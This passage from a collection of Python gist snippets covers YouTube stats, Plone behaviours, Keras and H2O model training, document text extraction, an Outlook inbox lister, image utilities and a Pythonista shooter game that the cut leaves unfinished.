def process(self, youtube_link):
v = pafy.new(youtube_link)
self.views = v.viewcount
self.ups = v.likes
self.downs = v.dislikes
self.title = v.title
self.speakers = ", ".join(self.d['speakers'])
@staticmethod
def header():
return "{:>8} {:>6} {:>6} {} ({})".format("Views", "Ups", "Downs", "Title", "Speakers")
def __str__(self):
return "{:8,} {:6,} {:6,} {} ({})".format(self.views, self.ups, self.downs, self.title, self.speakers)
def process(video):
v = Video(video)
q.put(v)
sys.stdout.write('.'); sys.stdout.flush()
def main():
print(conf)
#
r = requests.get(conf_url)
d = r.json()
with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:
for video in d['videos']:
executor.submit(process, video)
#
print()
li = []
while not q.empty():
li.append(q.get())
#
li.sort(key=operator.attrgetter("views"), reverse=True)
print(Video.header())
for e in li:
print(e)
##############################################################################
if __name__ == "__main__":
main()
```
#### File: hard-gists/3990769/snippet.py
```python
from plone.behavior.interfaces import IBehavior
from plone.dexterity.behavior import DexterityBehaviorAssignable
from zope.annotation import IAnnotations
from zope.component import queryUtility
from zope.interface import alsoProvides, noLongerProvides
INSTANCE_BEHAVIORS_KEY = KEY = 'g24.elements.instance_behaviors'
class DexterityInstanceBehaviorAssignable(DexterityBehaviorAssignable):
""" Support per instance specification of plone.behavior behaviors
"""
def __init__(self, context):
super(DexterityInstanceBehaviorAssignable, self).__init__(context)
annotations = IAnnotations(context)
self.instance_behaviors = annotations.get(KEY, ())
def enumerateBehaviors(self):
self.behaviors = self.fti.behaviors + self.instance_behaviors
for name in self.behaviors:
behavior = queryUtility(IBehavior, name=name)
if behavior is not None:
yield behavior
def enable_behaviors(obj, behaviors, ifaces):
""" Enable behaviors on an object.
:param obj: The Dexterity content object to enable behaviors on.
:type obj: object
:param behaviors: Behaviors to be enabled on the object. This is a list of
dotted names of behavior schema interfaces.
:type behaviors: list
:param ifaces: Behavior marker interfaces belonging to the behaviors to be
enabled. This is a list of interface classes.
:type ifaces: class
Use it like so:
>>> from plone.app.event.dx.interfaces import IDXEvent
>>> enable_behaviors(obj, ['plone.app.event.dx.behaviors.IEventBasic',],
... [IDXEvent,])
"""
annotations = IAnnotations(obj)
instance_behaviors = annotations.get(KEY, ())
instance_behaviors += behaviors
annotations[KEY] = instance_behaviors
for iface in ifaces:
alsoProvides(obj, iface)
obj.reindexObject(idxs=('object_provides'))
def disable_behaviors(obj, behaviors, ifaces):
""" Disable behaviors on an object.
:param obj: The Dexterity content object to disable behaviors on.
:type obj: object
:param behaviors: Behaviors to be disabled on the object. This is a list of
dotted names of behavior schema interfaces.
:type behaviors: list
:param ifaces: Behavior marker interfaces belonging to the behaviors to be
disabled. This is a list of interface classes.
:type ifaces: class
Use it like so:
>>> from plone.app.event.dx.interfaces import IDXEvent
>>> disable_behaviors(obj, ['plone.app.event.dx.behaviors.IEventBasic',],
... [IDXEvent,])
"""
annotations = IAnnotations(obj)
instance_behaviors = annotations.get(KEY, ())
instance_behaviors = filter(lambda x: x not in behaviors,
instance_behaviors)
annotations[KEY] = instance_behaviors
for iface in ifaces:
noLongerProvides(obj, iface)
obj.reindexObject(idxs=('object_provides'))
```
#### File: hard-gists/3a2a081e4f3089920fd8aecefecbe280/snippet.py
```python
from __future__ import print_function
import numpy as np
np.random.seed(1) # for reproducibility
from keras.datasets import mnist
from keras.models import Sequential, model_from_json
from keras.layers.core import Dense, Dropout, Activation, Flatten
from keras.layers.convolutional import Convolution2D, MaxPooling2D
from keras.utils import np_utils
def build_data(classes,total_classes,X_train_all,y_train_all,X_test_all,y_test_all):
train_ind = []
test_ind = []
for c in classes:
train_ind.extend(list(np.where(y_train_all==c)[0]))
test_ind.extend(list(np.where(y_test_all==c)[0]))
X_train = X_train_all[train_ind,:,:]
X_test = X_test_all[test_ind,:,:]
y_train_true = y_train_all[train_ind]
y_train = np.zeros(y_train_true.shape)
y_test_true = y_test_all[test_ind]
y_test = np.zeros(y_test_true.shape)
for i,c in enumerate(classes):
train_ind = list(np.where(y_train_true==c)[0])
test_ind = list(np.where(y_test_true==c)[0])
y_train[train_ind] = i
y_test[test_ind] = i
X_train = X_train.reshape(X_train.shape[0], 1, img_rows, img_cols)
X_test = X_test.reshape(X_test.shape[0], 1, img_rows, img_cols)
X_train = X_train.astype('float32')
X_test = X_test.astype('float32')
X_train /= 255
X_test /= 255
# convert class vectors to binary class matrices
Y_train = np_utils.to_categorical(y_train, total_classes)
Y_test = np_utils.to_categorical(y_test, total_classes)
return X_train, Y_train, X_test, Y_test
def build_model(old_model=None):
model = Sequential()
if old_model is None:
model.add(Convolution2D(nb_filters, nb_conv, nb_conv,
border_mode='valid',
input_shape=(1, img_rows, img_cols)))
else:
weights = old_model.layers[0].get_weights()
model.add(Convolution2D(nb_filters, nb_conv, nb_conv,
border_mode='valid',weights=weights,
input_shape=(1, img_rows, img_cols)))
model.add(Activation('relu'))
if old_model is None:
model.add(Convolution2D(nb_filters, nb_conv, nb_conv))
else:
weights = old_model.layers[2].get_weights()
model.add(Convolution2D(nb_filters, nb_conv, nb_conv,weights=weights))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(nb_pool, nb_pool)))
model.add(Dropout(0.25))
model.add(Flatten())
if old_model is None:
model.add(Dense(128))
else:
weights = old_model.layers[7].get_weights()
model.add(Dense(128,weights=weights))
model.add(Activation('relu'))
model.add(Dropout(0.5))
return model
if __name__ == '__main__':
MODEL_TRAINED = False
# input image dimensions
img_rows, img_cols = 28, 28
# the data, shuffled and split between train and test sets
(X_train_all, y_train_all), (X_test_all, y_test_all) = mnist.load_data()
if not MODEL_TRAINED:
batch_size = 256
total_classes = 10
nb_epoch = 12
# number of convolutional filters to use
nb_filters = 32
# size of pooling area for max pooling
nb_pool = 2
# convolution kernel size
nb_conv = 3
classes = [9,1,6]
X_train, Y_train, X_test, Y_test = build_data(classes,3,
X_train_all,y_train_all,X_test_all,y_test_all)
model1 = build_model()
model1.add(Dense(len(classes)))
model1.add(Activation('softmax'))
model1.compile(loss='categorical_crossentropy',optimizer='adadelta',metrics=['accuracy'])
model1.fit(X_train, Y_train, batch_size=batch_size, nb_epoch=nb_epoch,
verbose=1, validation_data=(X_test, Y_test))
# Save this model for later interrogation
json_string = model1.to_json()
open('model1_incremental_architecture.json', 'w').write(json_string)
model1.save_weights('model1_incremental_weights.h5')
score = model1.evaluate(X_test, Y_test, verbose=0)
print('Test score:', score[0])
print('Test accuracy:', score[1])
# Now create a new model with all total_classes in the softmax layer. Copy over the weights to
# this new network and initialize the new class connections randomly.
model2 = build_model(old_model=model1)
model2.add(Dense(total_classes))
# Replace the corresponding weights of the new network with the previously trained class weights
weights = model2.layers[-1].get_weights()
old_weights = model1.layers[-2].get_weights() # Last dense layer is second to last layer
weights[0][:,-len(classes):] = old_weights[0]
weights[1][-len(classes):] = old_weights[1]
model2.layers[-1].set_weights(weights)
model2.add(Activation('softmax'))
model2.compile(loss='categorical_crossentropy',optimizer='adadelta',metrics=['accuracy'])
new_classes = [7, 0, 3, 5, 2, 8, 4]
class_mapping = new_classes[:]
class_mapping.extend(classes)
X_train, Y_train, X_test, Y_test = build_data(new_classes,10,
X_train_all,y_train_all,X_test_all,y_test_all)
model2.fit(X_train, Y_train, batch_size=batch_size, nb_epoch=nb_epoch,
verbose=1, validation_data=(X_test, Y_test))
score = model2.evaluate(X_test, Y_test, verbose=0)
print('Test score:', score[0])
print('Test accuracy:', score[1])
# Save the incrementally trained model
json_string = model2.to_json()
open('model2_incremental_architecture.json', 'w').write(json_string)
model2.save_weights('model2_incremental_weights.h5')
X_test = X_test_all.reshape(X_test_all.shape[0], 1, img_rows, img_cols)
X_test = X_test.astype('float32')
X_test /= 255
# Convert class vectors to binary class matrices
# Note, that when a new image is presented to this network, the label of the image must be
# fed into class_mapping to get the "real" label of the output
y_test = np.array([class_mapping.index(c) for c in y_test_all])
Y_test = np_utils.to_categorical(y_test, total_classes)
score = model2.evaluate(X_test, Y_test, verbose=1)
print('Total Test score:', score[0])
print('Total Test accuracy:', score[1])
else:
# Load the incrementally trained model and test it
model = model_from_json(open('model2_incremental_architecture.json').read())
model.load_weights('model2_incremental_weights.h5')
model.compile(loss='categorical_crossentropy',optimizer='adadelta',metrics=['accuracy'])
classes = [7, 0, 3, 5, 2, 8, 4, 9, 1, 6]
X_train, Y_train, X_test, Y_test = build_data(classes,10,
X_train_all,y_train_all,X_test_all,y_test_all)
score = model.evaluate(X_test, Y_test, verbose=1)
print('Total Test score:', score[0])
print('Total Test accuracy:', score[1])
score = model.evaluate(X_train, Y_train, verbose=1)
print('Total Train score:', score[0])
print('Total Train accuracy:', score[1])
```
#### File: hard-gists/3b71a120ae7789956ef8/snippet.py
```python
import zipfile
import PyPDF2
from subprocess import Popen, PIPE
from pptx import Presentation
import xlrd
import sys
thismodule = sys.modules[__name__]
SUPPORT_EXTENTIONS = ['docx', 'doc', 'pdf', 'ppt', 'pptx', 'xls', 'xlsx']
try:
from xml.etree.cElementTree import XML
except ImportError:
from xml.etree.ElementTree import XML
"""
Module that extract text from MS XML Word document (.docx).
(Inspired by python-docx <https://github.com/mikemaccana/python-docx>)
"""
WORD_NAMESPACE = '{http://schemas.openxmlformats.org/wordprocessingml/2006/main}'
PARA = WORD_NAMESPACE + 'p'
TEXT = WORD_NAMESPACE + 't'
def get_docx_text(path):
"""
Take the path of a docx file as argument, return the text in unicode.
"""
document = zipfile.ZipFile(path)
xml_content = document.read('word/document.xml')
document.close()
tree = XML(xml_content)
paragraphs = []
for paragraph in tree.getiterator(PARA):
texts = [node.text
for node in paragraph.getiterator(TEXT)
if node.text]
if texts:
paragraphs.append(''.join(texts))
return '\n\n'.join(paragraphs)
def get_pdf_text(path):
pdfFileObj = open(path, 'rb')
pdfReader = PyPDF2.PdfFileReader(pdfFileObj)
res = []
for i in range(pdfReader.numPages):
pageObj = pdfReader.getPage(i)
res.append(pageObj.extractText())
return "\n".join(res)
def get_doc_text(path):
#cmd = ['antiword', '-m', 'utf-8.txt', path]
cmd = ['catdoc', '-d', 'utf-8', path]
try:
p = Popen(cmd, stdout=PIPE)
stdout, stderr = p.communicate()
return stdout.decode('utf-8', 'ignore')
except:
return ''
def get_ppt_text(path):
cmd = ['catppt', '-d', 'utf-8', path]
try:
p = Popen(cmd, stdout=PIPE)
stdout, stderr = p.communicate()
return stdout.decode('utf-8', 'ignore')
except:
return ''
def get_pptx_text(path):
prs = Presentation(path)
text_runs = []
for slide in prs.slides:
for shape in slide.shapes:
if not shape.has_text_frame:
continue
for paragraph in shape.text_frame.paragraphs:
for run in paragraph.runs:
text_runs.append(run.text)
return " ".join(text_runs)
def get_xls_text(path):
workbook = xlrd.open_workbook(path)
sheets_name = workbook.sheet_names()
output = "\n"
for names in sheets_name:
worksheet = workbook.sheet_by_name(names)
num_rows = worksheet.nrows
num_cells = worksheet.ncols
for curr_row in range(num_rows):
#row = worksheet.row(curr_row)
new_output = []
for index_col in xrange(num_cells):
value = worksheet.cell_value(curr_row, index_col)
if value:
if isinstance(value, (int, float)):
value = unicode(value)
new_output.append(value)
if new_output:
output += u' '.join(new_output) + u'\n'
return output
def get_xlsx_text(path):
return get_xls_text(path)
def textract(fname, ftype):
if ftype in SUPPORT_EXTENTIONS:
return getattr(thismodule, 'get_' + str(ftype) + '_text')(fname)
else:
f = open(fname, 'r')
return f.read()
```
#### File: hard-gists/3c2e5bf1e77986dfd51f/snippet.py
```python
import keras
from keras.models import Sequential
from keras.layers.core import Dense, Dropout, Activation
from keras.optimizers import SGD
from keras.wrappers.scikit_learn import KerasClassifier
import numpy as np
def target2classes(y):
y_2class = np.zeros((y.shape[0],2))
y_2class[y==0, 0] = 1
y_2class[y==1, 1] = 1
return y_2class
# Data generation
np.random.seed(1337)
X = np.random.rand(88737, 245)
X = (X-X.mean(axis=0))/X.std(axis=0)
y = np.random.binomial(1, 1.0/2500, size=(88737,))
# Model definition
model = Sequential()
model.add(Dense(2000, input_dim=245, init='uniform'))
model.add(Activation('tanh'))
model.add(Dropout(0.2))
model.add(Dense(2000, init='uniform'))
model.add(Activation('tanh'))
model.add(Dropout(0.2))
model.add(Dense(600, init='uniform'))
model.add(Activation('tanh'))
model.add(Dropout(0.2))
model.add(Dense(2, init='uniform'))
model.add(Activation('sigmoid'))
rmsprop = keras.optimizers.RMSprop(lr=0.00001, rho=0.9, epsilon=1e-6)
# Training
y_ohe = target2classes(y)
inverse_frequencies = float(y_ohe.sum())/y_ohe.sum(axis=0)
class_weight = dict((i, inverse_freq) for i, inverse_freq in enumerate(inverse_frequencies))
model.compile(loss='binary_crossentropy',
optimizer=rmsprop)
model.fit(X, y_ohe, batch_size=256,
nb_epoch=1,
class_weight=class_weight,
verbose=1)
```
#### File: hard-gists/3d5aa90144a4696be61b3991aa339cc5/snippet.py
```python
import win32com.client
items = []
def encodeit(s):
if isinstance(s, str):
return unicode(s, 'utf-8')
else:
return s
def extract():
outlook = win32com.client.Dispatch("Outlook.Application").GetNamespace("MAPI")
inbox = outlook.GetDefaultFolder(6) # "6" refers to the inbox
messages = inbox.Items
message = messages.GetFirst()
while message:
try:
d = dict()
d['Subject'] = encodeit(getattr(message, 'Subject', '<UNKNOWN>'))
d['SentOn'] = encodeit(getattr(message, 'SentOn', '<UNKNOWN>'))
d['EntryID'] = encodeit(getattr(message, 'EntryID', '<UNKNOWN>'))
d['Sender'] = encodeit(getattr(message, 'Sender', '<UNKNOWN>'))
d['Size'] = encodeit(getattr(message, 'Size', '<UNKNOWN>'))
d['Body'] = encodeit(getattr(message, 'Body', '<UNKNOWN>'))
items.append(d)
except Exception as inst:
print "Error processing mail"
message = messages.GetNext()
def showMessage():
items.sort(key=lambda tup: tup['SentOn'])
for i in items:
print i["SentOn"], i["Subject"]
extract()
showMessage()
```
#### File: hard-gists/3d99498d4236248f9bfbc8ed2fd424fa/snippet.py
```python
import h2o
from h2o.estimators.gbm import H2OGradientBoostingEstimator
from h2o.estimators.deeplearning import H2ODeepLearningEstimator
from h2o.estimators.glm import H2OGeneralizedLinearEstimator
from h2o.estimators.random_forest import H2ORandomForestEstimator
from sklearn import metrics #will be replaced with ensemble_performance later
def source_stack_utils():
'''
Current location of h2o stack python utils
'''
import urllib
url = "https://gist.githubusercontent.com/ledell/8ba8d064ae13169a1821faac70d2211b/raw/7d0fa741df619d1a5340e06258a91831951be8a9/stack.py"
urllib.urlretrieve(url, "stack.py")
def prep_data_example():
# Import a sample binary outcome train/test set into R
train = h2o.import_file("http://www.stat.berkeley.edu/~ledell/data/higgs_10k.csv")
test = h2o.import_file("http://www.stat.berkeley.edu/~ledell/data/higgs_test_5k.csv")
y = "C1"
x = list(train.columns)
x.pop(0)
family = "binomial"
#For binary classification, response should be a factor
train[y] = train[y].asfactor()
test[y] = test[y].asfactor()
return x, y, train, test, family
def cvtrain_base_models(x, y, train, family):
'''
Here we (5-fold) cross-validate a collection of base models
This is an example of an ensemble of nine models:
- 3 GBM
- 3 DL
- 2 RF
- 1 GLM
'''
# All models must use exact same CV folds
nfolds = 5
fold_assignment = 'Modulo'
# TO DO: Sync up family and distribution and un-hardcode distribution below
gbm1 = H2OGradientBoostingEstimator(distribution='bernoulli',
ntrees=100,
max_depth=4,
learn_rate=0.1,
nfolds=nfolds,
fold_assignment=fold_assignment,
keep_cross_validation_predictions=True)
gbm2 = H2OGradientBoostingEstimator(distribution='bernoulli',
ntrees=100,
max_depth=4,
learn_rate=0.1,
col_sample_rate=0.7,
nfolds=nfolds,
fold_assignment=fold_assignment,
keep_cross_validation_predictions=True)
gbm3 = H2OGradientBoostingEstimator(distribution='bernoulli',
ntrees=100,
max_depth=2,
learn_rate=0.1,
nfolds=nfolds,
fold_assignment=fold_assignment,
keep_cross_validation_predictions=True)
dl1 = H2ODeepLearningEstimator(distribution='bernoulli',
activation='Rectifier',
hidden=[50,50,50],
l1=1e-5,
epochs=10,
nfolds=nfolds,
fold_assignment=fold_assignment,
keep_cross_validation_predictions=True)
dl2 = H2ODeepLearningEstimator(distribution='bernoulli',
activation='RectifierWithDropout',
hidden=[100,100,100],
input_dropout_ratio=0.2,
l1=1e-5,
epochs=10,
nfolds=nfolds,
fold_assignment=fold_assignment,
keep_cross_validation_predictions=True)
dl3 = H2ODeepLearningEstimator(distribution='bernoulli',
activation='Rectifier',
hidden=[200,200],
l1=1e-6,
epochs=10,
nfolds=nfolds,
fold_assignment=fold_assignment,
keep_cross_validation_predictions=True)
rf1 = H2ORandomForestEstimator(#distribution='bernoulli',
ntrees=300,
nfolds=nfolds,
fold_assignment=fold_assignment,
keep_cross_validation_predictions=True)
rf2 = H2ORandomForestEstimator(#distribution='bernoulli',
ntrees=300,
sample_rate=0.7,
mtries=10,
nfolds=nfolds,
fold_assignment=fold_assignment,
keep_cross_validation_predictions=True)
glm1 = H2OGeneralizedLinearEstimator(family='binomial',
nfolds=nfolds,
fold_assignment=fold_assignment,
keep_cross_validation_predictions=True)
# Edit this list of base models to make different ensembles
models = [gbm1, gbm2, gbm3, dl1, dl2, dl3, rf1, rf2, glm1]
for model in models:
model.train(x=x, y=y, training_frame=train)
return models
def main():
h2o.init()
# Load some example binary response data
x, y, train, test, family = prep_data_example()
# Load stacking utils
source_stack_utils()
from stack import make_Z, get_cvpreds, stack, metapredict
# Cross-validation & training of base models
# Above we train an abitrary assortment of base models
models = cvtrain_base_models(x=x, y=y, train=train, family=family)
# Define a NN-GLM metalearner
metalearner = H2OGeneralizedLinearEstimator(family='binomial', non_negative=True)
# Fit the stacked ensemble / Super Learner
metafit = stack(models=models,
metalearner=metalearner,
response_frame=train[y],
seed=1,
keep_levelone_data=True)
# Generate ensemble prediction on the test set
pred, basepred = metapredict(models=models, metafit=metafit, test_data=test)
# TO DO: Add metafit.ensemble_performance()
# Evaluate ensemble test performance
preds = pred[2].as_data_frame(True)
labels = test[y].as_data_frame(True)
fpr, tpr, thresholds = metrics.roc_curve(labels, preds, pos_label=1)
auc = metrics.auc(fpr, tpr)
print str(auc) + " " + "H2O Ensemble"
# Evaluate base learner test set performance (for comparison)
for model in models:
bperf = model.model_performance(test_data=test)
print str(bperf.auc()) + " " + model.model_id
# 0.792100100148 H2O Ensemble
# 0.781849246474 GBM_model_python_1471654758738_1
# 0.782052358716 GBM_model_python_1471654758738_816
# 0.769195957061 GBM_model_python_1471654758738_1837
# 0.729095165124 DeepLearning_model_python_1471654758738_3028
# 0.691393671746 DeepLearning_model_python_1471654758738_3057
# 0.724608757556 DeepLearning_model_python_1471654758738_3086
# 0.78333120166 DRF_model_python_1471654758738_3115
# 0.787051172219 DRF_model_python_1471654758738_3896
# 0.687091955549 GLM_model_python_1471654758738_4639
# In this example, ensemble test AUC was 0.792 and the top base learner was 0.783
```
#### File: hard-gists/4004895/snippet.py
```python
import sys
import numpy as np
import scipy.ndimage as nd
from scipy.cluster.vq import vq
from scipy.misc import imsave
def crayola_9():
"""
Palette of the first 8 crayola colors + white
"""
palette = []
palette.append([0,0,0])
palette.append([31, 117, 254])
palette.append([180, 103, 77])
palette.append([28, 172, 120])
palette.append([255, 117, 56])
palette.append([238, 32 ,77 ])
palette.append([146, 110, 174])
palette.append([252, 232, 131])
palette.append([255, 255, 255])
return np.array(palette)
def quantize(fname, palette):
"""
quantize an image with a given color palette
"""
# read image and resize
img = nd.imread(fname)
# reshape to array of points
pixels = np.reshape(img, (img.shape[0] * img.shape[1], 3))
# quantize
qnt, _ = vq(pixels, palette)
# reshape back to image
centers_idx = np.reshape(qnt, (img.shape[0], img.shape[1]))
clustered = palette[centers_idx]
# return quantized image and histogram
return clustered
if __name__ == '__main__':
# get filename
fname = sys.argv[1]
# quantize single file
result = quantize(fname, crayola_9())
# save resulting image
imsave('output.png', result)
```
#### File: hard-gists/4020619/snippet.py
```python
import Foundation
import objc
import AppKit
import sys
NSUserNotification = objc.lookUpClass('NSUserNotification')
NSUserNotificationCenter = objc.lookUpClass('NSUserNotificationCenter')
def notify(title, subtitle, info_text, delay=0, sound=False, userInfo={}):
notification = NSUserNotification.alloc().init()
notification.setTitle_(title)
notification.setSubtitle_(subtitle)
notification.setInformativeText_(info_text)
notification.setUserInfo_(userInfo)
if sound:
notification.setSoundName_("NSUserNotificationDefaultSoundName")
notification.setDeliveryDate_(Foundation.NSDate.dateWithTimeInterval_sinceDate_(delay, Foundation.NSDate.date()))
NSUserNotificationCenter.defaultUserNotificationCenter().scheduleNotification_(notification)
notify("Test message", "Subtitle", "This message should appear instantly, with a sound", sound=True)
sys.stdout.write("Notification sent...\n")
```
#### File: hard-gists/4034426/snippet.py
```python
import Image
import ImageDraw
import ImageFont
import clipboard
def draw_caption(img, text, top=False):
draw = ImageDraw.Draw(img)
#Find a suitable font size to fill the entire width:
w = img.size[0]
s = 100
while w >= (img.size[0] - 20):
font = ImageFont.truetype('HelveticaNeue-CondensedBlack', s)
w, h = draw.textsize(text, font=font)
s -= 1
if s <= 12: break
#Draw the text multiple times in black to get the outline:
for x in xrange(-3, 4):
for y in xrange(-3, 4):
draw_y = y if top else img.size[1] - h + y
draw.text((10 + x, draw_y), text, font=font, fill='black')
#Draw the text once more in white:
draw_y = 0 if top else img.size[1] - h
draw.text((10, draw_y), text, font=font, fill='white')
def main():
print 'Loading image from clipboard...'
img = clipboard.get_image()
if img is None:
print 'No image in clipboard, using default image instead...'
img = Image.open('Test_Mandrill')
img.show()
print 'Enter the top caption (press return for none):'
caption_top = unicode(raw_input(), 'utf-8')
caption_top = caption_top.upper()
if caption_top != '':
draw_caption(img, caption_top, top=True)
print 'Enter the bottom caption (press return for none):'
caption_btm = unicode(raw_input(), 'utf-8')
caption_btm = caption_btm.upper()
if caption_btm != '':
draw_caption(img, caption_btm, top=False)
img.show()
# If you want to copy the result to the clipboard automatically,
# uncomment the following line:
#clipboard.set_image(img.convert('RGBA'))
# You can also copy an image from the console output or save it
# to your camera roll by touching and holding it.
if __name__ == '__main__':
main()
```
#### File: hard-gists/4050951/snippet.py
```python
from scene import *
from random import randint, random, choice
from sound import play_effect
from colorsys import hsv_to_rgb
from math import sin
from functools import partial
from copy import copy
class Star (object):
def __init__(self):
self.x = randint(0, 768)
self.y = randint(0, 1024)
self.v = random() * 5 + 1
def update(self):
self.y -= self.v
class StarField (object):
def __init__(self, scene, count):
self.scene = scene
self.stars = []
for i in xrange(count):
self.stars.append(Star())
def update(self):
removed_stars = set()
for star in self.stars:
star.update()
if star.y < 0:
removed_stars.add(star)
for removed_star in removed_stars:
self.stars.remove(removed_star)
new_star = Star()
new_star.y = self.scene.size.h
self.stars.append(new_star)
def draw(self):
background(0, 0.02, 0.1)
for star in self.stars:
a = (star.v / 5) * 0.7
fill(a, a, a)
rect(star.x, star.y, 3, 3)
class Player (object):
def __init__(self, scene):
self.scene = scene
self.x = scene.size.w / 2
self.dead = False
def update(self):
gx = gravity().x * 50
self.x = min(max(self.x + gx, 20), self.scene.size.w - 20)
def draw(self):
push_matrix()
translate(self.x, 20)
rotate(45)
image('Rocket', 0, 0, 64, 64)
pop_matrix()
def bbox(self):
return Rect(self.x - 20, 20, 40, 85)
class Enemy (object):
def __init__(self, scene):
self.scene = scene
self.hit = False
self.x = randint(20, 768-20)
self.initial_x = self.x
self.y = 1024
self.a = 1.0
self.removed = False
self.dead = False
r = random()
if r < 0.1:
self.size = 128
self.color = Color(0, 1, 1)
self.points = 500
self.energy = 3
self.bullet_type = 3
elif r < 0.5:
self.size = 96
self.color = Color(0, 1, 0)
self.points = 250
self.energy = 2
self.bullet_type = 2
else:
self.size = 64
self.color = Color(1, 0, 1)
self.points = 100
self.energy = 1
self.bullet_type = 1
self.fire_freq = randint(20, 200)
self.fire = False
self.t = randint(0, self.fire_freq)
self.speed = 1.0 / self.size * 500
self.amp = random() * 300
def update(self, dt):
self.y -= self.speed
self.x = self.initial_x + sin(self.y / 100) * self.amp
self.amp = max(self.amp * 0.99, 0)
if self.y < -64:
self.removed = True
if self.dead:
self.a -= 0.1
if self.a <= 0:
self.removed = True
else:
self.t += 1
if not self.dead and self.t % self.fire_freq == 0:
play_effect('Laser_5')
if self.bullet_type == 1:
bullet = Bullet(self.x, self.y)
bullet.vy = -10
bullet.bullet_type = 1
self.scene.enemy_bullets.append(bullet)
elif self.bullet_type == 2:
for vx in [-3, 3]:
bullet = Bullet(self.x, self.y)
bullet.vy = -10
bullet.vx = vx
bullet.bullet_type = 2
self.scene.enemy_bullets.append(bullet)
else:
for vx in [-3, 0, 3]:
bullet = Bullet(self.x, self.y)
bullet.vy = -10
bullet.vx = vx
bullet.bullet_type = 3
self.scene.enemy_bullets.append(bullet)
def draw(self):
if self.hit:
tint(1, 0, 0, self.a)
else:
tint(self.color.r, self.color.g, self.color.b, self.a)
image('Alien_Monster', self.x - self.size/2,
self.y - self.size/2, self.size, self.size)
tint(1, 1, 1)
def bbox(self):
s = self.size
return Rect(self.x - s/2 * 0.9, self.y - s/2 * 0.8, s * 0.9, s * 0.8)
class Powerup (object):
def __init__(self, scene, powerup_type):
self.x = randint(20, 768-20)
self.y = scene.size.h + 20
self.hue = 0.0
self.rot = 0.0
self.t = 0.0
self.powerup_type = powerup_type
def update(self):
self.hue += 0.02
self.y -= 10
self.rot -= 3.0
self.t += 0.1
def draw(self):
if self.powerup_type == 0:
s = 50 + sin(self.t) * 10
image('Heart', self.x - s/2, self.y - s/2, s, s)
else:
push_matrix()
tint(*hsv_to_rgb(self.hue, 1, 1))
translate(self.x, self.y)
rotate(self.rot)
image('Star_1', -32, -32, 64, 64)
tint(1, 1, 1)
pop_matrix()
def bbox(self):
return Rect(self.x - 32, self.y - 32, 64, 64)
class Bullet (object):
def __init__(self, x, y):
self.x = x
self.y = y
self.vx = 0
self.vy = 0
self.bullet_type = 0
self.pass_through = False
self.hue = 0.0
def update(self):
self.x += self.vx
self.y += self.vy
if self.pass_through:
self.hue += 0.02
def draw(self):
if self.pass_through:
fill(*hsv_to_rgb(self.hue, 1, 1))
ellipse(self.x - 4, self.y - 4, 8, 8)
elif self.bullet_type == 0:
fill(1, 1, 0)
ellipse(self.x - 4, self.y - 4, 8, 8)
elif self.bullet_type == 1:
fill(1, 0, 1)
rect(self.x - 2, self.y - 8, 4, 16)
elif self.bullet_type == 2:
fill(0, 1, 0)
ellipse(self.x - 4, self.y - 4, 8, 8)
elif self.bullet_type == 3:
fill(0, 1, 1)
ellipse(self.x - 4, self.y - 4, 8, 8)
def hit_test(self, rect):
return Point(self.x, self.y) in rect
class Game (Scene):
def setup(self):
self.frame_count = 0
self.delayed_invocations = []
self.frenzy = False
self.touch_disabled = False
self.star_field = StarField(self, 30)
self.player = Player(self)
self.energy = 100
self.score = 0
self.player.dead = False
self.stars = []
self.bullets = []
self.enemies = []
self.powerups = []
self.enemy_bullets = []
self.shot_fired = False
self.effects_layer = Layer(Rect(0, 0, self.size.w, self.size.h))
self.spawn()
def spawn(self):
self.enemies.append(Enemy(self))
self.delay(random() + 0.5, self.spawn)
if random() < 0.05:
powerup = Powerup(self, choice([0, 1]))
self.powerups.append(powerup)
def draw(self):
self.shot_fired = False
self.star_field.update()
self.star_field.draw()
removed_bullets = set()
removed_enemy_bullets = set()
removed_enemies = set()
fill(1, 1, 0)
for bullet in self.bullets:
bullet.update()
bullet.draw()
if bullet.y > 1024:
removed_bullets.add(bullet)
player_rect = self.player.bbox()
fill(1, 0, 1)
for bullet in self.enemy_bullets:
bullet.update()
bullet.draw()
if bullet.y < -4:
removed_enemy_bullets.add(bullet)
elif not self.player.dead and bullet.hit_test(player_rect):
removed_enemy_bullets.add(bullet)
self.energy -= 10
play_effect('Explosion_6')
for enemy in self.enemies:
enemy.update(self.dt)
enemy.draw()
enemy_rect = enemy.bbox()
if not enemy.dead:
for bullet in self.bullets:
if bullet.hit_test(enemy_rect):
removed_bullets.add(bullet)
enemy.energy -= 1
enemy.hit = True
self.delay(0.1, partial(enemy.__setattr__, 'hit', False))
if enemy.energy <= 0:
enemy.dead = True
self.explosion(enemy)
self.score += enemy.points
play_effect('Explosion_4')
else:
play_effect('Explosion_5')
if not self.player.dead and player_rect.intersects(enemy_rect):
play_effect('Explosion_6')
enemy.dead = True
self.explosion(enemy)
self.energy -= 10
if enemy.removed:
removed_enemies.add(enemy)
removed_powerups = set()
for powerup in self.powerups:
powerup.update()
powerup.draw()
if player_rect.intersects(powerup.bbox()):
if powerup.powerup_type == 0:
play_effect('Coin_2')
self.energy = min(100, self.energy + 20)
else:
play_effect('Powerup_3')
self.frenzy = True
self.delay(5.0, partial(self.__setattr__, 'frenzy', False))
removed_powerups.add(powerup)
elif powerup.y < -32:
removed_powerups.add(powerup)
map(self.powerups.remove, removed_powerups)
map(self.enemies.remove, removed_enemies)
map(self.bullets.remove, removed_bullets)
map(self.enemy_bullets.remove, removed_enemy_bullets)
if not self.player.dead and self.energy <= 0:
self.game_over()
if not self.player.dead:
self.player.update()
self.player.draw()
self.draw_status_bar()
self.effects_layer.update(self.dt)
self.effects_layer.draw()
tint(1, 1, 1)
self.frame_count += 1
if not self.player.dead and len(self.touches) > 0:
if self.frame_count % 12 == 0:
self.fire()
def game_over(self):
self.player.dead = True
self.touch_disabled = True
play_effect('Laser_4')
t = TextLayer('Game Over', 'Futura', 100)
t.frame.center(self.bounds.center())
self.delay(2.0, partial(self.__setattr__, 'touch_disabled', False))
t.scale_x, t.scale_y = 0.0, 0.0
t.animate('scale_x', 1.0, 1.0, curve=curve_bounce_out)
t.animate('scale_y', 1.0, 1.0, curve=curve_bounce_out)
self.effects_layer.add_layer(t)
def touch_began(self, touch):
if self.player.dead and not self.touch_disabled:
play_effect('Powerup_1')
self.setup()
return
elif not self.player.dead:
self.frame_count = 0
self.fire()
def fire(self):
if self.shot_fired: return
if self.frenzy:
for vx in [-3, 0, 3]:
bullet = Bullet(self.player.x, 110)
